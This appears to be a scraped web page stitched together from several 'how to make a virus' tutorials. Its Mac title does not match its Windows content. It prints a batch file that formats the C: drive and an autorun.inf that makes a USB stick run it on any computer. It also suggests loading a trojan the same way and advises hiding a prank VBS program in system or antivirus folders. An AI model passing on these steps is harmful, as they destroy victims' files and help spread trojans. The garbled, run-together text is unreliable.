How To Make A Harmless Virus For Mac

How To Create USB VIRUS. 1. Created By Ayan For Make your own USB VirusIn this tutorial I am going to teach you how to make a USB stick autorun a virus.this is educational purpose only! IStep 1: Format your USB StickStep 2: Open Notepad and put in the following.Code:@echo offtitle Delete C:clsecho Are you sure you want to delete all your files?
Virus 2: Make a Fake Virus Batch File: This is also a funny virus prank that I recently came across. The best thing about this prank is that it resembles an original virus attack. Just try it by yourself to see whats happens. Step 1: Open Notepad. Step 2: Copy and paste the below code in your notepad.
(y/n)pause nulecho Deleting files.Format C:Save this as XXX.bat to the root of your USB Stick.Step 3: Open Notepad again and put in the following.Code:autorunicon=(name of your icon).icoopen=XXX.bataction=Click here to open your flash drive.shellopencommand=XXX.bat^^Save this as autorun.inf.Make sure you take out the when you put in your iconsname, and you have to save the icon you have on the root of the USB Stick.Step 4: You are done! Feel free to change it up a little, you can make XXX.bat load up an.exe, so if you have a trojan that is.exe then you can make it load that, make sure that youinclude where it is loading the file from.Step 5: To use your USB Stick plug it in to any computer and run your autorun file. TheUSB Stick should format the C: drive therefore deleting all files.Thank you!have fun.Please Surf an Ad If You Like it.
Harmless Virus Code
- Most of you may be curious to know about how to make a Trojan or Virus on your own. Well, here is an answer to your curiosity. Well, here is an answer to your curiosity. In this, post I’ll show you how to make a simple trojan on your own using the C programming language.
- Check out this video to learn how to write a harmless virus for computers running Mac OS X. Admit, you're curious. You want to know just what does it take to make a virus for the Mac OS X operating system.
Who hasn't gone mad trying to fix his/her computer, trying to delete all of the harmful software? It may not be funny with a real virus, but a fake one is. Or course, you can make a simple virus just with Notepad. There's no need to download applications to fool others; in less than 1 minute you will learn how to create a fake virus to scare friends, family or even teachers!
Step 1 Open Notepad Click on Start Accessories Notepad. Step 2 Content Here comes the important step, which consist on programming the virus. First, we will write the command inside notepad: X=MsgBox('Message Description',0+16,'Title') The message description means that you can write the content of the message inside the bar and the title also. Each command between bracket has its signification. For example, you can write: X=MsgBox('Fatal Error System Shutdown',0+16,'Error') Then you can change numbers; each one has a signification:.

16 = Critical Icon (with red X). 32 = Help Icon (with?). 48 = Warning Icon (with!). 64 = Information Icon (just a simple icon without any sign and just the message) So, try changing the number and you will get different results. Step 3 Result Your work is almost done. Now you need to save as.vbs extension like this: For example, let's save it with the name virus and you will get: Bravo! Now you've made your little virus that's gonna freak someone out.
Create A Harmless Virus
When the victim clicks on it on his/her computer, they will see: 'Oh my, God! Why can't my antivirus recognize it? It wasn't very hard after all, was it?

Certainly you are free to change the numbers between the brackets so you will have different windows. For example, let's try one with 0+16: This operation can be made in less than one minute, and can freak out almost anyone who doesn't have a wide knowledge about computers! Tip. For a very useful effect, try hiding this malicious application inside system folders or inside antivirus folder. Warning. I am not responsible for any heart attack, unconsciousness or others symptoms made by this application!:D Related.